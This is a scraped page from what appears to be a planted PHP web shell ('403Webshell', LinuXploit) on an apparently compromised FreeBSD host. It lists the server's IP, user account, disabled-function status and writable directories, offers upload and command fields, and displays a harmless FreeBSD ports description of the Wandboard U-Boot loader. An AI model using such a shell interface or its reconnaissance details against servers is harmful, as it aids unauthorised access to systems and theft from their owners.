403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/sysutils/u-boot-wandboard/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/sysutils/u-boot-wandboard/pkg-descr
U-Boot loader for Wandboard Solo, Dual, and Quad.

Install the u-boot.imx file onto the boot disk using:

  dd if=u-boot.imx of=/dev/whatever bs=1k oseek=1 conv=sync

The U-Boot built by this port expects the first 1MB of the boot media to
be reserved for the U-Boot executable and saved environment.  The u-boot.imx
file begins at an offset of 1K from the start of the boot disk.  The U-Boot
environment area begins at an offset of 512K.

This version is patched so that:
 * ELF and API features are enabled to support ubldr.
 * A single U-Boot image supports Solo, Dual[lite], and Quad processors.
 * When the selected board has multiple SD or MMC devices available, the
   mmc0 device in U-Boot (and thus the disk0 device in loader(8)) will be
   whichever device U-Boot was loaded from by the ROM bootloader routines.

The sources for this port were originally obtained from commit 87f595d1ee
at https://github.com/TechNexion/U-Boot-edm/ which appears to be a slightly
modified fork of the stock U-Boot 2013.10 release.  As of this writing,
the changes in this fork have not been rolled back into upstream U-Boot.

Youez - 2016 - github.com/yon3zu
LinuXploit